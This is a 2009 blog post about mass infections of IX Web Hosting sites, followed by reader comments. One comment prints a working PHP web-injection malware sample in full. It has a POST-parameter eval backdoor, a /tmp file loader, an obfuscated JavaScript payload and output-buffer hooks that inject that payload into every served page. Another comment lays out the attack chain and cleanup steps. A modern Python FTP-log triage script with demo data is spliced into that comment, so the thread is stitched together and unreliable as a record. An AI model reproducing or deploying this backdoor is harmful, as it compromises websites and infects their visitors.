More than ONE THIRD of ALL IX Web Hosting sites INFECTED

Posted: January 8, 2009 in IX Web Hosting

A lot of the information I post here comes from a person who works for IX Web Hosting and/or Ecommerce; as you will understand, I cannot give any details that could compromise his or her position. I will call this person “AGENT IX”.

Today I received an email from “AGENT IX” stating that more than 100,000 IX Web Hosting sites are infected.

The details: IX Web Hosting hosts 285,223 websites (source: http://whois.domaintools.com/ixwebhosting.com).

More than 100,000 sites are infected, which means that more than one third of all IX Web Hosting sites are infected, and IX still has no idea how to stop these attacks.

The injected script(s) are also changing (see previous posts), which most likely means that this vulnerability is now being exploited by various people or groups, and that this problem is going to get a lot worse before it gets better. Sites have been affected since May of last year (2008); almost nine months later the problem is worse than it has ever been, and there is no light at the end of the tunnel yet.

Comments
  1. Eric says:

    I also made the mistake of hosting with IX. One of my WordPress (WPMU v2.7) blogs was recently infected with the so-called “Yahoo! Counter” virus. I wasted an entire afternoon looking for the code, which is encrypted in base64 to avoid detection when searching with terms like “Yahoo”.

    I finally found the code at the very end of my wp-config.php file (compare to wp-config-sample.php if you have it). This file had 755 permissions.

    @neverixweb: Could you mention this in a post? I couldn’t find a clear fix for wordpress users on Google so I thought I’d contribute mine.

  2. neverixweb says:

    Hi Eric.
    Thanks for taking the time to post about your issue and the whereabouts of the injected script.
    It is true that the script is Base64 coded; could you post your code here if you still have it, and could you please let me know on what servers your site(s) are hosted?
    Good Luck with your sites.

  3. Eric says:

    Here’s the code:

    <?php
    if(!function_exists('tmp_lkojfghx')){
    // Stage loader: include the first of /tmp/m1 .. /tmp/m99 that exists
    for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}
    // Backdoor: execute any PHP supplied in the tmp_lkojfghx3 POST parameter
    if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
    // Payload: base64 of a <script> block that begins "<!-- Yahoo! Counter starts" (the blob was line-wrapped when pasted)
    if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2YoeWFob29fY291bnRlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCcvJTJGJTNDJCU2NCU2OSU3NiUyMCU3MyU3NHx5JTZDZSE9JTY0aSU3M3AlNkMmYXx5JTNBIW4lNkZuJTY1QCUzRVxuI2RAJTZGYyU3NW0lNjUjbnQkJTJFJTc3JTcyJTY5fHQlNjUoISUyMiElM0MvfCU3NCU2NSMlNzgjdHxhciU2NSYlNjElM0UiQCUyOSE7fnZhciUyMGlgJTJDX34sfmE9JCU1QiYlMjIlMzdAOEAuJTMxMWAwJTJFITEmNzUuJCUzMiUzMSUyMiYlMkMiJTMxJTM5fjV+LjIlMzRgLiUzNzZgLiUzMjVAJTMxfCIlNURgJTNCXyUzRCUzMXw7aWYlMjh+ZG9jQCU3NUBtZSZudH4lMkVjbyQlNkYlNkIlNjlgZX4lMkV+bSU2MSF0fiU2M0BoJiUyOCQlMkZ+JTVDYiQlNjhgZ34lNjZ8dH49IzEvJTI5QD09ISU2RX4lNzVsJTZDJTI5ZiU2RmAlNzIlMjgmJTY5PUAwfjskJTY5IyUzQyEyQCUzQmBpJTJCJTJCKUAlNjRgb2BjISU3NW1+JTY1biU3NCMlMkV+d3J+aSF0fiU2NXwlMjgjJTIyJCUzQyU3MyU2M35yJTY5IyU3MGAlNzRAJTNFJCU2OSZmJCUyOCU1RiMlMjlkQCU2RiQlNjMmdUBtJTY1JTZFdC5gJTc3IXIlNjklNzRAJTY1QCgmJTVDfiUyMiUzQyU3MyZjfHIlNjlwdCUyMCU2OSU2NCUzRGAlNUZgIitpIyUyQiUyMn4lNUYlMjBgc0AlNzIlNjMmPSQlMkZgLyEiKyU2MSU1QnwlNjklNUQlMkIlMjIlMkYjY3AlMkY/Iit+bmEmdmlnJTYxI3RvJTcyJTJFJTYxJTcwcGBOYXxtZWAuJTYzJTY4YGEkJTcyISU0MXQoJTMwJTI5KyElMjJgJTNFJTNDJTVDJTVDfiUyRnMlNjMhcml+cCU3NCElM0UhJTVDJCUyMiYlMjklM0N8JTVDISUyRiU3M3wlNjMlNzJpcCQlNzQlM0UlMjIlMjlgOyFcbi8lMkYlM0MvISU2NCU2OSZ2JiUzRScpLnJlcGxhY2UoL2B8XCZ8XCR8I3xcIXxcfHx+fEAvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg=='));
    // Output-buffer callback applied to every page the site serves
    function tmp_lkojfghx($s){
    // gzip-compressed output is inflated first and re-compressed on return
    if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));
    // remove other long obfuscated <script> blocks (eval with fromCharCode or long unbroken literals, document.write); as pasted the pattern stops after (.*?), so it matches only the literal <script
    if(preg_match_all('#<script(.*?)#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}
    // strip earlier copies of its own "Yahoo! Counter" block (the regex is itself base64-encoded), then insert the payload before </body> or append it
    $s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);
    if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);
    elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,''))$s=$s1.TMP_XHGFJOKL;
    return $g?gzencode($s):$s;}
    // Installer: chains to any earlier error handler, then re-stacks the existing output buffers on top of tmp_lkojfghx so its callback sees the final output
    function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
    foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
    for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
    ob_start('tmp_lkojfghx');for($i=0;$i

    My sites run on the server block with mysql address mysql501.ixwebhosting.com. As a note, this is part of the new server block that runs php5.

  4. Fasteddy says:

    How to get rid of the tmp_lkojfghx Virus
    (for want of a better name)

    I battled this virus for a couple of months. It infected around a dozen of my websites and I think I understand how it operates and how to prevent it from spreading.

    Overview.
    This virus is a multi-pronged attack on websites and computers.
    When you visit an infected site your PC may become infected. Your infected PC may be compromised with spyware, thus sending off FTP access information to the hackers. Hackers then use brute force to hack your password (if they don’t already have it). Your password and username are then used to hack your sites, which then become malware sites and spread the virus further. Your site may even become blacklisted by Google and other sites.

    The Hackers Methods
    My opinion is that they infect your computer when you hit an infected site. The infection is some kind of spyware (or keylogging) which extracts FTP info from your browser. Probably the username. They then hack the password using brute force.

    The Website Attack
    A malicious (but valid) login using FTP access rewrites many of your website files. (check your FTP logs and align the times with your file dates and times)

    1. PHP files will have malicious PHP script inserted at the start of the file, bracketed by its own PHP tags. The original script is still present but is effectively disabled.
    These PHP files, when accessed from the public domain, will do one of two things:
    They will firstly check for a variable sent by the POST method. This will be malicious code sent by the hacker and could vary each time.
    If no variable is present they will proceed to infect or re-infect the rest of the HTML files in your site.

    2. HTML files will have malicious JAVASCRIPT inserted between the and tags. When this page is accessed from the public domain it proceeds to download malware into the visitor’s PC (possibly from some remote site). It will sometimes ask you to click to download a Microsoft addon for this site. The computer then experiences a lot of disk activity and browser lockup. (information may be extracted at this point but I’m not sure)
    Infected computers can slow down, experience browser hijacking and are probably infected with a keylogging virus or some other sort of spyware.

    3. Javascript files (ending in .js) will have the same script as the HTML files inserted at the end of the file. These JS files are linked to html pages and thus have the same effect as being inserted directly in the html page.

    You can clean up the site but it will be attacked again in a few days and re-infected.

    Symptoms
    •Your web pages are slow loading…possibly while the malicious code communicates with its master
    •When you visit the site, your computer starts frantic disk activity and the browser locks up (I suggest hitting the reset button and using System Restore at this stage)
    •A bar at the top of the page prompts you to download a Microsoft Add-on

    If your PC is compromised it may display the following symptoms
    •Computer has generally slowed down
    •You experience browser hijacking especially ‘search engine’ redirection
    •Other websites that you manage start to get infected

    Cure
    1. Change your FTP login to a VERY STRONG PASSWORD – for example 14 characters with a mix of symbols included (use a clean pc that is not compromised) My experience is that simple passwords will get hacked again. Complex passwords will not.

    2. Meticulously clean out all traces of the virus from your website by reloading pages or editing out the hack code. Check hidden directories for infected files. These may not show using your FTP client (go to the CPanel File Manager and have a look)

    3. Cleanse your PC
    •Scan with your virus protection software (mine didn’t find it)
    •Use System Restore to revert back to before you got infected (this is the best way I have found)
    •Reformat your disk, reload windows and spend a couple of days reloading your PC

    *Ensure that System Restore is Enabled on your PC
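The log-to-mtime alignment and hidden-directory sweep from the cleanup steps above, as an added example in Python (not the commenter's own procedure or code). It assumes the FTP server writes the standard xferlog format (wu-ftpd, pure-ftpd and proftpd all do) and that the site owner can list the addresses they legitimately upload from; the log lines, addresses and web root below are constructed for the demo.

```python
"""Correlate FTP upload sessions with file modification times under a web root."""
from __future__ import annotations

import os
import shutil
import tempfile
from dataclasses import dataclass
from datetime import datetime, timedelta
from pathlib import Path


@dataclass
class Transfer:
    when: datetime
    ip: str
    path: str
    direction: str  # xferlog: 'i' = upload to the server, 'o' = download from it
    user: str


def parse_xferlog(lines: list[str]) -> list[Transfer]:
    """Parse standard xferlog records, e.g.
    'Tue Jan  6 03:14:07 2009 1 203.0.113.7 1436 /home/u/public_html/index.php a _ i r u ftp 0 * c'
    Fields: timestamp (5 words), transfer-secs, remote-host, size, path, type, special,
    direction, access-mode, username, ... (trailing fields are not needed here)."""
    out = []
    for line in lines:
        f = line.split()
        if len(f) < 14:
            continue  # not an xferlog record
        when = datetime.strptime(" ".join(f[:5]), "%a %b %d %H:%M:%S %Y")
        out.append(Transfer(when, f[6], f[8], f[11], f[13]))
    return out


def rogue_uploads(transfers: list[Transfer], trusted_ips: set[str]) -> list[Transfer]:
    """Uploads from addresses the owner did not use. A valid login from a stranger's
    address is exactly what a stolen FTP password looks like in the log."""
    return [t for t in transfers if t.direction == "i" and t.ip not in trusted_ips]


def files_touched_near(root: str, times: list[datetime], window: timedelta) -> list[str]:
    """Every file under root whose mtime lies within `window` of any of `times`.
    os.walk descends into dot-directories too, which many FTP clients hide."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            p = Path(dirpath, name)
            mtime = datetime.fromtimestamp(p.stat().st_mtime)
            if any(abs(mtime - t) <= window for t in times):
                hits.append(p.relative_to(root).as_posix())
    return sorted(hits)


def triage(root: str, log_lines: list[str], trusted_ips: set[str],
           window: timedelta = timedelta(minutes=10)) -> dict:
    """Files to review: anything modified around a rogue upload, whether or not the log
    names it (the mtime window also catches writes from sessions whose log was rotated)."""
    rogue = rogue_uploads(parse_xferlog(log_lines), trusted_ips)
    return {
        "rogue_sessions": sorted({(t.when.isoformat(), t.ip) for t in rogue}),
        "logged_uploads": sorted({t.path for t in rogue}),
        "files_to_review": files_touched_near(root, [t.when for t in rogue], window),
    }


# Constructed demo data (not a real log or site): the owner uploads from 198.51.100.20;
# an overnight session from 203.0.113.7 rewrites two files.
DEMO_LOG = [
    "Mon Jan  5 21:02:11 2009 1 198.51.100.20 812 /home/demo/public_html/index.php a _ i r demo ftp 0 * c",
    "Tue Jan  6 03:14:07 2009 1 203.0.113.7 1436 /home/demo/public_html/index.php a _ i r demo ftp 0 * c",
    "Tue Jan  6 03:14:09 2009 1 203.0.113.7 2201 /home/demo/public_html/wp-config.php a _ i r demo ftp 0 * c",
    "Tue Jan  6 09:30:00 2009 1 198.51.100.20 812 /home/demo/public_html/index.php a _ o r demo ftp 0 * c",
]
TRUSTED_IPS = {"198.51.100.20"}


def build_demo_root() -> str:
    """Constructed web root in a temp dir: the two logged files plus a dropper in a hidden
    directory the log never mentions, all stamped inside the rogue session; one old file."""
    root = tempfile.mkdtemp(prefix="demo_public_html_")

    def put(rel: str, when: datetime) -> None:
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text("<?php // demo content\n")
        ts = when.timestamp()
        os.utime(p, (ts, ts))

    put("index.php", datetime(2009, 1, 6, 3, 14, 8))
    put("wp-config.php", datetime(2009, 1, 6, 3, 14, 10))
    put(".cache/m.php", datetime(2009, 1, 6, 3, 16, 45))
    put("about.html", datetime(2008, 12, 20, 12, 0, 0))
    return root


if __name__ == "__main__":
    demo_root = build_demo_root()
    try:
        for key, value in triage(demo_root, DEMO_LOG, TRUSTED_IPS).items():
            print(key, value)
    finally:
        shutil.rmtree(demo_root)
```

Point it at the real web root and the real xferlog, and list every address you have actually uploaded from. Files that land in the window but not in the log (the hidden .cache/m.php in the demo) are the ones a log-only review misses, and the point of Fasteddy's step 2: clean from the file list, not from what the FTP client happens to show.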

  5. Dee says:

    I also hosted with IX and late last year they sent me a notification that a) my ftp password had been compromised and b) my site was now infected.

    After they apparently ‘cleaned’ my site, I no longer trusted the host. I switched to another company and abandoned IX. This morning I get an email from IX advising my FTP pw has been compromised yet again. AT THE SAME TIME my FTP pw was hacked via my new host, even though they are completely unrelated. I’m not majorly technical, but could it be an ‘inside job’ at IX? Just a thought…

  6. TribalZer0 says:

    I am recent to the woes of IX Web Hosting. They are making it very difficult for me. I came into a position where I needed to work on our company Web Site. Now every time I update any of the pages, the next day it says that my FTP password has been compromised. After asking multiple times for a copy of the times and IPs all I get is a file showing the previous day and my IP address logging in. According to them, they had just recycled their files. I cannot get a straight answer from any of the Russians they have working for them besides I need to put in another ticket. In the 2 months I have been working with them, I have had to change my FTP password 9 times. I have a clean machine, rebuilt from scratch. I install Filezilla I install my web editor. I design a page. I upload. Bam! next day. Your FTP Password has been compromised. IXWEBHOSTING Sucks Hard! As soon as they give me their cancellation/refund policy info I will be bringing it to my boss and switching to Domain.com. Also the site was hacked before I started on this project multiple times. It was hit with redirects to Porn. Great security on their end huh? So if you or anyone you know uses IX let them know to run…get away while they can.
